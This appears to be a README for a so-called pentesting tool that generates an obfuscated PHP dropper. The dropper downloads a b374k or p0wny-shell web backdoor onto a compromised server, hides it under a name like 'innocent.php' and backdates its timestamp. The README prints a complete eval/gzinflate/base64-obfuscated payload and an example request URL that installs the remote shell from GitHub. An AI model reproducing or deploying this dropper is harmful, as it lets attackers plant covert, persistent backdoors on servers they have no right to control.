Pentesting tools.
By default this script will generate an obfuscated PHP payload (saved as out.php) that when executed in a server will download a b374k backdoor, save it as obfuscated.php in the same directory and send a touch command to set 17-Aug-2021 10:23:42.
path= Where to save the backdoor (or file you wish)
url=The URL of the the backdoor (or file you wish)
fname= The name it'll be saved as on the server
In the following example the URL containing the payload that was uploaded (obfuscated.php) will pass the args path as being one directory above (../), the url to the p0wny-shell backdoor to be saved as fname innocent.php:
http://vulnerable.site/uploads/out.php?path=../&url=https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php&fname=innocent.php
For the default args, the output will look like this (saved as out.php):
<?php
$func="cr"."eat"."e_fun"."cti"."on";$obfus=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$obfus("bZBfa4MwFMXf/RRZEawwTe1WCq1rn7Y97mUvY4wS47UJVSPJtWOMffclsf9WJoie+7v35OTm6050QbjtGAryQMLN8+Pre+RU9LEMwl7X2blsla9WLWvgou61I7Ii4xtpDOB4sIzj74DYJzz4RymNlsFPALWBv2Tod+zSZDjp5OKls1FF1RvOEMrU5r+2PLYdxq9N3aVOllY4Q4HYmQWlmn2mW4miL3oDmqsWocWUq4YWjO9KpbRF1Aio6+RYSWppkDbMIOgBURuKFnfz+91/8YYjfQxHwuq4Av9ND7HdnmUNm5Ihs9D/bwE3h0zG3yNeBh50/SXwhrfkPG/bUPVcnJBBjQplA+PRJEteOCbTyTQjWbaYzBaz+Si2E8CFGo9yka2elC5kWUJ7k1Mr80L79031pFRthESwPZAOdGM3LFVLUBHGORhDUEhDSqmBo9JfxDFXsbvdg05H9pj16hc=");?>
python3.11 phpPayloadObfuscate.py
If you get the error:
TypeError: compress() takes at most 2 arguments (3 given)
You're not running on Python 3.11
You can find usefull information on how to make good use of this code here.
Include more content to this repo.